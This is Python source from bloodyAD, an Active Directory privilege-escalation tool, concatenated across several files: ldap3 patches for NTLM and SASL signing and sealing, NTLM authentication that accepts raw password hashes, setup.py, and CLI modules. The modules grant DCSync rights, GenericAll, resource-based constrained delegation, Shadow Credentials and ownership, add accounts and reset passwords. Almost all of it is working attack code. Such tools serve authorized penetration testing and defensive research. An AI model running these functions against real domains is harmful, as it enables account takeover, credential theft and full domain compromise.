                    # When the LDAP response is splitted accross multiple TCP packets, the SASL buffer length is equal to the MTU of each packet..Which is usually not equal to self.socket_size
                    # This means that the end of one SASL packet/beginning of one other....could be located in the middle of data
                    # We are using "sasl_received_data" instead of "data" & "unprocessed" for this reason

                    sasl_next_packet = sasl_received_data[
                        sasl_buffer_length:
                    ]  # the last "data" variable may contain another sasl packet. We'll process it at the next iteration.

                    if self.connection.sasl_mechanism == DIGEST_MD5:
                        # structure of messages when LDAP signing is enabled : sizeOf(encoded_message + signature + 0x0001 + secNum) + encoded_message + signature + 0x0001 + secNum
                        sasl_sec_num = sasl_received_data[
                            sasl_buffer_length - 4 : sasl_buffer_length
                        ]
                        sasl_received_data = sasl_received_data[
                            : sasl_buffer_length - 6
                        ]  # Removing secNum and the message type number to fit also encryption
                        sasl_buffer_length = len(
                            sasl_received_data
                        )  # We can do that because len(ciphertext) == len(plaintext) for RC4
                        if self.connection._digest_md5_kcs_cipher:
                            # structure of messages when LDAP encryption is enabled: sizeOf(ciphertext + 0x0001 + secNum) + CIPHER(encoded_message + pad+ signature) + 0x0001 + secNum
                            sasl_received_data = (
                                self.connection._digest_md5_kcs_cipher.decrypt(
                                    sasl_received_data
                                )
                            )
                        sasl_signature = sasl_received_data[sasl_buffer_length - 10 :]
                        sasl_received_data = sasl_received_data[
                            : sasl_buffer_length - 10
                        ]  # retrieve encoded_message
                        kis = self.connection._digest_md5_kis  # renamed to lowercase GC
                        calculated_signature = bytes.fromhex(
                            md5_hmac(kis, sasl_sec_num + sasl_received_data)[0:20]
                        )
                        if sasl_signature != calculated_signature:
                            raise LDAPSignatureVerificationFailedError(
                                "Signature verification failed for the"
                                " recieved LDAP message number "
                                + str(int.from_bytes(sasl_sec_num, "big"))
                                + ". Expected signature "
                                + calculated_signature.hex()
                                + " but got "
                                + sasl_signature.hex()
                                + "."
                            )

                    elif self.connection.authentication == NTLM:
                        sasl_received_data = self.connection.ntlm_client.unseal(
                            sasl_received_data[:sasl_buffer_length]
                        )

                    elif self.connection.sasl_mechanism == GSSAPI:
                        if posix_gssapi_unavailable:
                            import winkerberos

                            winkerberos.authGSSClientUnwrap(
                                self.connection.krb_ctx,
                                base64.b64encode(
                                    sasl_received_data[:sasl_buffer_length]
                                ).decode("utf-8"),
                            )
                            sasl_received_data = base64.b64decode(
                                winkerberos.authGSSClientResponse(
                                    self.connection.krb_ctx
                                )
                            )
                        else:
                            sasl_received_data = self.connection.krb_ctx.unwrap(
                                sasl_received_data[:sasl_buffer_length]
                            ).message

                    sasl_total_bytes_received = 0
                    unprocessed += sasl_received_data
                    sasl_received_data = b""
            else:
                unprocessed += data
        if len(data) > 0:
            length = BaseStrategy.compute_ldap_message_size(unprocessed)
            if length == -1:  # too few data to decode message length
                get_more_data = True
                continue
            if len(unprocessed) < length:
                get_more_data = True
            else:
                if log_enabled(NETWORK):
                    log(
                        NETWORK,
                        "received %d bytes via <%s>",
                        len(unprocessed[:length]),
                        self.connection,
                    )
                messages.append(unprocessed[:length])
                unprocessed = unprocessed[length:]
                get_more_data = False
                if len(unprocessed) == 0:
                    receiving = False
        else:
            receiving = False

    if log_enabled(NETWORK):
        log(
            NETWORK,
            "received %d ldap messages via <%s>",
            len(messages),
            self.connection,
        )
    return messages


SyncStrategy.receiving = receiving

from ldap3.utils.ntlm import *

CLIENT = "CLIENT"
SERVER = "SERVER"


def __init__(self, domain, user_name, password):
    self.client_config_flags = 0
    self.exported_session_key = None
    self.negotiated_flags = None
    self.user_name = user_name
    self.user_domain = domain
    self.no_lm_response_ntlm_v1 = None
    self.client_blocked = False
    self.client_block_exceptions = []
    self.client_require_128_bit_encryption = None
    self.max_life_time = None
    self.client_signing_key = None
    self.client_handle = None
    self.sequence_number = 0
    self.server_handle = None
    self.server_signing_key = None
    self.integrity = False
    self.replay_detect = False
    self.sequence_detect = False
    self.confidentiality = False
    self.datagram = False
    self.identity = False
    self.client_supplied_target_name = None
    self.client_channel_binding_unhashed = None
    self.unverified_target_name = None
    self._password = password
    self.server_challenge = None
    self.server_target_name = None
    self.server_target_info = None
    self.server_version = None
    self.server_av_netbios_computer_name = None
    self.server_av_netbios_domain_name = None
    self.server_av_dns_computer_name = None
    self.server_av_dns_domain_name = None
    self.server_av_dns_forest_name = None
    self.server_av_target_name = None
    self.server_av_flags = None
    self.server_av_timestamp = None
    self.server_av_single_host_data = None
    self.server_av_channel_bindings = None
    self.server_av_flag_constrained = None
    self.server_av_flag_integrity = None
    self.server_av_flag_target_spn_untrusted = None
    self.current_encoding = None
    self.client_challenge = None
    self.server_target_info_raw = None


NtlmClient.__init__ = __init__


def create_negotiate_message(self):
    """
    Microsoft MS-NLMP 2.2.1.1
    """
    self.reset_client_flags()
    client_flag = [
        FLAG_REQUEST_TARGET,
        FLAG_NEGOTIATE_128,
        FLAG_NEGOTIATE_NTLM,
        FLAG_NEGOTIATE_ALWAYS_SIGN,
        FLAG_NEGOTIATE_OEM,
        FLAG_NEGOTIATE_UNICODE,
        FLAG_NEGOTIATE_EXTENDED_SESSIONSECURITY,
    ]
    if self.confidentiality:
        client_flag.append(FLAG_NEGOTIATE_SEAL)
    self.set_client_flag(client_flag)

    message = NTLM_SIGNATURE  # 8 bytes
    message += pack("<I", NTLM_MESSAGE_TYPE_NTLM_NEGOTIATE)  # 4 bytes
    message += pack("<I", self.client_config_flags)  # 4 bytes
    message += self.pack_field("", 40)  # domain name field  # 8 bytes
    if self.get_client_flag(
        FLAG_NEGOTIATE_VERSION
    ):  # version 8 bytes - used for debug in ntlm
        message += pack_windows_version(True)
    else:
        message += pack_windows_version(False)
    return message


NtlmClient.create_negotiate_message = create_negotiate_message


def compute_nt_response(self):
    if not self.user_name and not self._password:  # anonymous authentication
        return b""

    self.client_challenge = urandom(8)
    temp = b""
    temp += pack("<B", 1)  # ResponseVersion - 1 byte
    temp += pack("<B", 1)  # HiResponseVersion - 1 byte
    temp += pack("<H", 0)  # Z(2)
    temp += pack("<I", 0)  # Z(4) - total Z(6)
    temp += self.pack_windows_timestamp()  # time - 8 bytes
    temp += self.client_challenge  # random client challenge - 8 bytes
    temp += pack("<I", 0)  # Z(4)
    temp += self.server_target_info_raw
    temp += pack("<I", 0)  # Z(4)
    response_key_nt = self.ntowf_v2()
    nt_proof_str = hmac.new(
        response_key_nt, self.server_challenge + temp, digestmod=hashlib.md5
    ).digest()
    nt_challenge_response = nt_proof_str + temp
    if self.confidentiality:
        self.exported_session_key = self._kxkey(response_key_nt, nt_proof_str)
        self._sealkey()
        self._signkey()
    return nt_challenge_response


NtlmClient.compute_nt_response = compute_nt_response


def _kxkey(self, response_key_nt, nt_proof_str):
    session_base_key = hmac.new(
        response_key_nt, nt_proof_str, digestmod=hashlib.md5
    ).digest()
    return session_base_key


setattr(NtlmClient, "_kxkey", _kxkey)


def _sealkey(self):
    from cryptography.hazmat.primitives.ciphers import Cipher, algorithms

    client_sealing_key = hashlib.new(
        "MD5",
        self.exported_session_key
        + b"session key to client-to-server sealing key magic constant\x00",
    ).digest()
    server_sealing_key = hashlib.new(
        "MD5",
        self.exported_session_key
        + b"session key to server-to-client sealing key magic constant\x00",
    ).digest()
    self.client_handle = Cipher(
        algorithms.ARC4(client_sealing_key), mode=None
    ).encryptor()
    self.server_handle = Cipher(
        algorithms.ARC4(server_sealing_key), mode=None
    ).decryptor()


setattr(NtlmClient, "_sealkey", _sealkey)


def _signkey(self):
    self.client_signing_key = hashlib.new(
        "MD5",
        self.exported_session_key
        + b"session key to client-to-server signing key magic constant\x00",
    ).digest()
    self.server_signing_key = hashlib.new(
        "MD5",
        self.exported_session_key
        + b"session key to server-to-client signing key magic constant\x00",
    ).digest()


setattr(NtlmClient, "_signkey", _signkey)


def sign(self, message, seqnum, side=CLIENT):
    signing_key = None
    if side == CLIENT:
        signing_key = self.client_signing_key
    else:
        signing_key = self.server_signing_key
    version = pack("<I", 1)
    checksum = hmac.new(signing_key, seqnum + message, digestmod=hashlib.md5).digest()[
        :8
    ]
    return version + checksum + seqnum


setattr(NtlmClient, "sign", sign)


def seal(self, message):
    payload = self.sign(
        message, pack("<I", self.sequence_number)
    ) + self.client_handle.update(message)
    self.sequence_number += 1
    return payload


setattr(NtlmClient, "seal", seal)


def unseal(self, sealed_message):
    message = self.server_handle.update(sealed_message[16:])
    calculated_signature = self.sign(message, sealed_message[12:16], SERVER)
    if calculated_signature != sealed_message[:16]:
        raise LDAPSignatureVerificationFailedError(
            "Signature verification failed for the received LDAP message number "
            + str(self.sequence_number)
            + ". Expected signature "
            + sealed_message[:16].hex()
            + " but got "
            + calculated_signature.hex()
            + "."
        )
    return message


setattr(NtlmClient, "unseal", unseal)

from bloodyAD import md4


def ntowf_v2(self):
    passparts = self._password.split(":")
    if len(passparts) == 2 and len(passparts[0]) == 32 and len(passparts[1]) == 32:
        # The specified password is an LM:NTLM hash
        password_digest = binascii.unhexlify(passparts[1])
    else:
        password_digest = md4.MD4(self._password.encode("utf-16-le")).digest()
    return hmac.new(
        password_digest,
        (self.user_name.upper() + self.user_domain).encode("utf-16-le"),
        digestmod=hashlib.md5,
    ).digest()


NtlmClient.ntowf_v2 = ntowf_v2

from ldap3.core.exceptions import LDAPOperationResult
from bloodyAD.formatters.winerror import WINERROR
import re


def __init__(
    self,
    result=None,
    description=None,
    dn=None,
    message=None,
    response_type=None,
    response=None,
):
    self.result = result
    self.description = description
    self.dn = dn
    self.type = response_type
    self.response = response

    if message:
        try:
            match = re.search("data ([0-9A-Fa-f]+)", message)
            if match:
                error_code = int(match.group(1), base=16)
                extended_error = WINERROR[error_code]
                self.message = extended_error["code"] + ": " + extended_error["message"]
            else:
                self.message = message
        except:
            self.message = message

    else:
        self.message = message


LDAPOperationResult.__init__ = __init__



from setuptools import setup

from pathlib import Path

this_directory = Path(__file__).parent
long_description = (this_directory / "README.md").read_text()

setup(
    name="bloodyAD",
    version="0.2.6",
    description="AD Privesc Swiss Army Knife",
    long_description=long_description,
    long_description_content_type="text/markdown",
    author="CravateRouge",
    author_email="baptiste.crepin@ntymail.com",
    url="https://github.com/CravateRouge/bloodyAD",
    download_url=(
        "https://github.com/CravateRouge/bloodyAD/archive/refs/tags/v0.2.6.tar.gz"
    ),
    license="MIT",
    install_requires=[
        "cryptography>=37.0.2",
        "ldap3>=2.9.1",
        "winacl>=0.1.6",
        'gssapi>=1.8.1 ; platform_system=="Linux" or platform_system=="Darwin"',
        'winkerberos>=0.9.0; platform_system=="Windows"',
    ],
    keywords=["Active Directory", "Privilege Escalation"],
    classifiers=[
        "Intended Audience :: Information Technology",
        "License :: OSI Approved :: MIT License",
        "Programming Language :: Python :: 3.8",
        "Programming Language :: Python :: 3.9",
        "Programming Language :: Python :: 3.10",
        "Programming Language :: Python :: 3.11",
    ],
    python_requires=">=3.8",
    entry_points={"console_scripts": ["bloodyAD = bloodyAD.main:main"]},
)



from bloodyAD.exceptions import BloodyError, ResultError
from bloodyAD import utils
from bloodyAD.utils import (
    resolvDN,
    getDefaultNamingContext,
    setAttr,
    getObjectSID,
)
from bloodyAD.utils import getSD, addRight, delRight
from bloodyAD.utils import addShadowCredentials, delShadowCredentials
from bloodyAD.utils import LOG
from bloodyAD.formatters import accesscontrol
from bloodyAD.cli_modules import get, set
import ldap3
import json
from functools import wraps
from ldap3.extend.microsoft import (
    addMembersToGroups,
    modifyPassword,
    removeMembersFromGroups,
)
from ldap3.protocol.formatters.formatters import format_sid


functions = []


def register_module(f):
    functions.append((f.__name__, f))

    @wraps(f)
    def wrapper(*args, **kwds):
        return f(*args, **kwds)

    return wrapper


@register_module
def getObjectAttributes(conn, target, attr="*", resolve_sd="False", raw="False"):
    """
    Retrieves LDAP attributes for the target object provided

    :param target: sAMAccountName, DN, GUID or SID of the target
    :param attr: name of the attribute to retrieve, retrieves all the attributes by default
    :param resolve_sd: if set, permissions linked to a security descriptor will be resolved !!resolving can take some time!!
    :param raw: if set, will return attributes as sent by the server without any formatting, binary data will be outputed in base64
    """
    resolve_sd = resolve_sd == "True"
    raw = raw == "True"
    get.object(conn, target, attr, resolve_sd, raw)


@register_module
def setAttribute(conn, identity, attribute, value):
    """
    Add or replace an attribute of an object
    Args:
        identity: sAMAccountName, DN, GUID or SID of the object
        attribute: Name of the attribute
        value: jSON array (e.g ["john.doe"])
    """
    value = json.loads(value)
    setAttr(conn, identity, attribute, value)


@register_module
def addUser(conn, sAMAccountName, password, ou=None):
    """
    Add a new user in the LDAP database
    By default the user object is put in the OU Users
    This can be changed with the ou parameter
    Args:
        identity: sAMAccountName of the target
        password: the password that will be set for the user account
        ou: Optional parameters - Where to put the user object in the LDAP directory
    """
    ldap_conn = conn.getLdapConnection()

    if ou:
        user_dn = f"cn={sAMAccountName},{ou}"
    else:
        naming_context = getDefaultNamingContext(ldap_conn)
        user_dn = f"cn={sAMAccountName},cn=Users,{naming_context}"

    attr = {
        "objectClass": ["top", "person", "organizationalPerson", "user"],
        "distinguishedName": user_dn,
        "sAMAccountName": sAMAccountName,
        "userAccountControl": 544,
        "unicodePwd": ('"%s"' % password).encode("utf-16-le"),
    }

    ldap_conn.add(user_dn, attributes=attr)

    if ldap_conn.result["description"] == "success":
        LOG.info(f"[+] {sAMAccountName} has been successfully added")
    else:
        raise BloodyError(ldap_conn.result["description"])


@register_module
def addComputer(conn, hostname, password, ou=None):
    """
    Add a new computer in the AD database
    By default the computer object is put in the OU CN=Computers
    This can be changed with the ou parameter
    Args:
        hostname: computer name (without the trailing $ symbol)
        password: the password that will be set for the computer account
        ou: Optional parameters - Where to put the computer object in the LDAP directory
    """
    cnf = conn.conf
    ldap_conn = conn.getLdapConnection()

    if ou:
        computer_dn = f"cn={hostname},{ou}"
    else:
        naming_context = getDefaultNamingContext(ldap_conn)
        computer_dn = f"cn={hostname},cn=Computers,{naming_context}"

    # Default computer SPNs
    spns = [
        "HOST/%s" % hostname,
        "HOST/%s.%s" % (hostname, cnf.domain),
        "RestrictedKrbHost/%s" % hostname,
        "RestrictedKrbHost/%s.%s" % (hostname, cnf.domain),
    ]
    attr = {
        "objectClass": [
            "top",
            "person",
            "organizationalPerson",
            "user",
            "computer",
        ],
        "dnsHostName": "%s.%s" % (hostname, cnf.domain),
        "userAccountControl": 0x1000,
        "servicePrincipalName": spns,
        "sAMAccountName": f"{hostname}$",
        "unicodePwd": ('"%s"' % password).encode("utf-16-le"),
    }

    ldap_conn.add(computer_dn, attributes=attr)

    if ldap_conn.result["description"] == "success":
        LOG.info(f"[+] {hostname} has been successfully added")
    else:
        raise BloodyError(ldap_conn.result["description"])


@register_module
def delObject(conn, identity):
    """
    Delete an object (user or group) from the Directory based on the identity provided
    Args:
        identity: sAMAccountName, DN, GUID or SID of the target
    """
    ldap_conn = conn.getLdapConnection()
    dn = resolvDN(ldap_conn, identity)
    LOG.debug(f"[*] Trying to remove {dn}")
    ldap_conn.delete(dn)
    LOG.info(f"[-] {dn} has been removed")


@register_module
def changePassword(conn, target, new_pass, old_pass=None):
    """
    Change password of a user/computer

    :param target: sAMAccountName, DN, GUID or SID of the target
    :param new_pass: new password for the target
    :param old_pass: old password of the target (mandatory if you don't have change password permission on the target with your account)
    """
    set.password(conn, target, new_pass, old_pass)


@register_module
def addObjectToGroup(conn, member, group):
    """
    Add an object to a group
        member: sAMAccountName, DN, GUID or SID of the object to add to the group
        group: sAMAccountName, DN, GUID or SID of the group
    """
    ldap_conn = conn.getLdapConnection()
    member_dn = resolvDN(ldap_conn, member)
    LOG.debug(f"[*] {member} found at {member_dn}")
    group_dn = resolvDN(ldap_conn, group)
    LOG.debug(f"[*] {group} found at {group_dn}")
    addMembersToGroups.ad_add_members_to_groups(
        ldap_conn, member_dn, group_dn, raise_error=True
    )
    LOG.info(f"[+] {member_dn} added to {group_dn}")


@register_module
def addForeignObjectToGroup(conn, user_sid, group):
    """
    Add foreign principals (users or groups), coming from a trusted domain, to a group
    Args:
        user_sid: foreign object sid
        group: sAMAccountName, DN, GUID or SID of the group
    """
    ldap_conn = conn.getLdapConnection()
    # https://social.technet.microsoft.com/Forums/en-US/6b7217e1-a197-4e24-9357-351c2d23edfe/ldap-query-to-add-foreignsecurityprincipals-to-a-group?forum=winserverDS
    magic_user_dn = f"<SID={user_sid}>"
    group_dn = resolvDN(ldap_conn, group)
    LOG.debug(f"[*] {group} found at {group_dn}")
    try:
        addMembersToGroups.ad_add_members_to_groups(
            ldap_conn, magic_user_dn, group_dn, raise_error=True
        )
        LOG.info(f"[+] {user_sid} added to {group_dn}")
    except ldap3.core.exceptions.LDAPEntryAlreadyExistsResult:
        LOG.warning(f"[!] {user_sid} already exists in {group_dn}")


@register_module
def delObjectFromGroup(conn, member, group):
    """
    Remove member from group
    Args:
        member: sAMAccountName, DN, GUID or SID of the object to delete from the group
        group: sAMAccountName, DN, GUID or SID of the group
    """
    ldap_conn = conn.getLdapConnection()
    member_dn = resolvDN(ldap_conn, member)
    group_dn = resolvDN(ldap_conn, group)
    removeMembersFromGroups.ad_remove_members_from_groups(
        ldap_conn, member_dn, group_dn, True, raise_error=True
    )
    LOG.info(f"[-] {member} removed from {group_dn}")


@register_module
def getChildObjects(conn, parent_obj, object_type="*"):
    """
    List the child objects of an object
    Args:
        base_obj: DN of the targeted parent object
        object_type: the type of object to fetch (user/computer or * to have them all)
    """
    res = utils.search(
        conn,
        parent_obj,
        f"(objectClass={object_type})",
        search_scope=ldap3.SUBTREE,
        attr="",
    )
    res = [entry["dn"] for entry in res if "dn" in entry]
    print(json.dumps(res, indent=4, sort_keys=True))
    return res


@register_module
def search(conn, search_base, ldap_filter, attr="*"):
    """
    Search in LDAP database
    Args:
        search_base: DN of the parent object
        ldap_filter: Filter to apply to the LDAP search (see LDAP filter syntax)
        attr: attributes to fetch (default is '*')
    """
    utils.search(
        conn,
        search_base,
        ldap_filter,
        search_scope=ldap3.SUBTREE,
        attr=attr.split(","),
    )
    res = json.loads(conn.getLdapConnection().response_to_json())
    print(json.dumps(res, indent=4, sort_keys=True))


@register_module
def setShadowCredentials(
    conn, identity, enable="True", outfilePath=None, rsakey_sha256=None
):
    """
    Add or delete attribute allowing to authenticate as the user provided using a crafted certificate (Shadow Credentials)
    Args:
        identity: sAMAccountName, DN, GUID or SID of the target (You must have write permission on it)
        enable: True to add Shadow Credentials for the user or False to remove it (default is True)
        outfilePath: file path for the generated certificate (default is current path)
        rsakey_sha256: rsakey_sha256 of the shadow credentials to remove from the target object (default is all)
    """
    if enable == "True":
        addShadowCredentials(conn, identity, outfilePath)
    else:
        delShadowCredentials(conn, identity, rsakey_sha256)


@register_module
def setGenericAll(conn, identity, target, enable="True"):
    """
    Give permission to an AD object to modify the properties of another object
    Args:
        identity: sAMAccountName, DN, GUID or SID of the object you control
        target:  sAMAccountName, GPO name, DN, GUID or SID
        enable: True to add GenericAll for the user or False to remove it (default is True)
    """
    enable = enable == "True"
    ldap_attribute = "nTSecurityDescriptor"
    control_flag = accesscontrol.DACL_SECURITY_INFORMATION
    access_mask = accesscontrol.ACCESS_FLAGS["FULL_CONTROL"]
    new_sd, old_raw_sd = getSD(conn, target)
    user_sid = getObjectSID(conn, identity)

    if enable:
        isChanged = addRight(new_sd, user_sid, access_mask)
        log = f"[+] {identity} has now GenericAll on {target}"
    else:
        isChanged = delRight(new_sd, user_sid, access_mask)
        log = f"[-] {identity} doesn't have GenericAll on {target} anymore"

    setAttr(conn, target, ldap_attribute, [new_sd.getData()], control_flag)

    LOG.info(log)
    return old_raw_sd if isChanged else None


@register_module
def setOwner(conn, identity, target):
    """
    Set an AD object as the owner of the target object
    Args:
        identity: sAMAccountName, DN, GUID or SID of your user (You must be Domain Admins to set another user)
        target: sAMAccountName, DN, GUID or SID of the targeted object (You must have WriteOwner permission on it)
    """
    ldap_attribute = "nTSecurityDescriptor"
    new_sd, _ = getSD(
        conn, target, ldap_attribute, accesscontrol.OWNER_SECURITY_INFORMATION
    )
    new_sid = format_sid(getObjectSID(conn, identity))

    old_sid = new_sd["OwnerSid"].formatCanonical()
    if old_sid == new_sid:
        LOG.warning(f"[!] {old_sid} is already the owner, no modification will be made")
        old_sid = None
    else:
        new_sd["OwnerSid"].fromCanonical(format_sid(new_sid))
        setAttr(conn, target, ldap_attribute, new_sd.getData())
        LOG.info(f"[+] Old owner {old_sid} is now replaced by {identity} on {target}")

    return old_sid


@register_module
def setRbcd(conn, spn, target, enable="True"):
    """
    Set Resource Based Constraint Delegation (RBCD) on the target to the SPN provided
    Args:
        spn: sAMAccountName, DN, GUID or SID of the SPN
        target: sAMAccountName, DN, GUID or SID of the target (You must have msDS-AllowedToActOnBehalfOfOtherIdentity write right on it)
        enable: True to add Rbcd and False to remove it (default is True)
    """
    enable = enable == "True"
    ldap_attribute = "msDS-AllowedToActOnBehalfOfOtherIdentity"
    control_flag = 0
    access_mask = accesscontrol.ACCESS_FLAGS["ADS_RIGHT_DS_CONTROL_ACCESS"]
    new_sd, old_raw_sd = getSD(conn, target, ldap_attribute, control_flag)
    spn_sid = getObjectSID(conn, spn)

    if enable:
        isChanged = addRight(new_sd, spn_sid, access_mask)
        log = f"[+] {spn} can now impersonate users on {target} via S4U2Proxy"
    else:
        isChanged = delRight(new_sd, spn_sid, access_mask)
        log = f"[-] {spn} can't impersonate users on {target} anymore"

    attr_values = []
    if len(new_sd["Dacl"].aces) > 0:
        attr_values.append(new_sd.getData())
    setAttr(conn, target, ldap_attribute, attr_values, control_flag)

    LOG.info(log)
    return old_raw_sd if isChanged else None


@register_module
def setDCSync(conn, identity, enable="True"):
    """
    Set the right to perform DCSync with the user provided (You must have write permission on the domain LDAP object)
    Args:
        identity: sAMAccountName, DN, GUID or SID of the user
        enable: True to add DCSync and False to remove it (default is True)
    """
    enable = enable == "True"
    ldap_attribute = "nTSecurityDescriptor"
    control_flag = accesscontrol.DACL_SECURITY_INFORMATION
    access_mask = accesscontrol.ACCESS_FLAGS["ADS_RIGHT_DS_CONTROL_ACCESS"]
    domain_dn = getDefaultNamingContext(conn.getLdapConnection())
    new_sd, old_raw_sd = getSD(conn, domain_dn)
    user_sid = getObjectSID(conn, identity)

    if enable:
        isChanged = addRight(new_sd, user_sid, access_mask)
        log = f"[+] {identity} is now able DCSync"
    else:
        isChanged = delRight(new_sd, user_sid, access_mask)
        log = f"[-] {identity} can't DCSync anymore"

    setAttr(conn, domain_dn, ldap_attribute, new_sd.getData(), control_flag)

    LOG.info(log)
    return old_raw_sd if isChanged else None


@register_module
def setUserAccountControl(conn, identity, flags, enable="True"):
    """
    Enable or disable the flags for the given user (must have a write permission on the UserAccountControl attribute of the target user)
    Args:
        identity: sAMAccountName, DN, GUID or SID of the target
        flags: hexadecimal value corresponding to flags to set (e.g for DONT_REQ PREAUTH: 0x400000)
        enable: True to add the flags or False to delete them (default is True)
    """
    enable = enable == "True"
    flags = int(flags, 16)

    response = utils.search(conn, identity, attr="userAccountControl")[0]
    LOG.debug(
        "[*] Original userAccountControl: "
        + str(response["attributes"]["userAccountControl"])
    )
    rawAccountControl = int(
        response["raw_attributes"]["userAccountControl"][0].decode()
    )

    if enable:
        rawAccountControl = rawAccountControl | flags
    else:
        rawAccountControl = rawAccountControl & ~flags

    setAttribute(conn, identity, "userAccountControl", str(rawAccountControl))
